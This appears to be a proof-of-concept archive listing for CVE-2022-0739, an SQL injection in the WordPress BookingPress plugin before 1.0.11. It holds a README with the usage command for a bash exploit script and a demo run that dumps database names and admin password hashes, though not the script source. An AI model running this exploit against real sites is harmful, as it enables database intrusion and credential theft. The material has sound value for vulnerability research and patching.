Associated vulnerability
Title:
WordPress plugin BookingPress SQL injection vulnerability
(CVE-2022-0739)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. It lets users host a personal blog site on a server running PHP and MySQL. WordPress plugins are open-source extensions to WordPress. Versions of the WordPress plugin BookingPress before 1.0.11 contain a SQL injection vulnerability: the bookingpress_front_get_category_services function, reachable via an AJAX request, does not properly sanitize user-supplied POST data before using it in a dynamically constructed SQL query.
Description
Simple bash script to automate the exploit of CVE-2022-0739
Introduction
# CVE-2022-0739
Proof-of-Concept exploit (SQLI BookingPress before 1.0.11)
# Usage
Supply the URL to where the Booking Press plugin is in use on the application.
bash exploit.sh '<insert url here>'
e.g. (Hashes are redacted in this demo)
┌──(user@user)-[~/]
└─$ bash sqli_exploit.sh 'http://localhost/calendar/'
[+] Exploiting http://localhost ...
[+] Vulnerable url at http://localhost/calendar/...
[+] Gettting nonce...
[+] Found nonce: 219087f4c2
[+] Extract database name...
information_schema
test_db
[+] Getting creds...
admin $P$BGrGrgXXXXXXXXXXXXXX
testUs3r $P$B4aNM28NXXXXXXXXXXX
---------------------------------------------------------------------
DISCLAIMER
Usage of this program without prior mutual consent can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
File snapshot
[4.0K] /data/pocs/973b4c731c7ea326b2f80a1896071c80235a7859
├── [1.3K] exploit.sh
└── [1.8K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. Shenlong has taken a snapshot of this PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.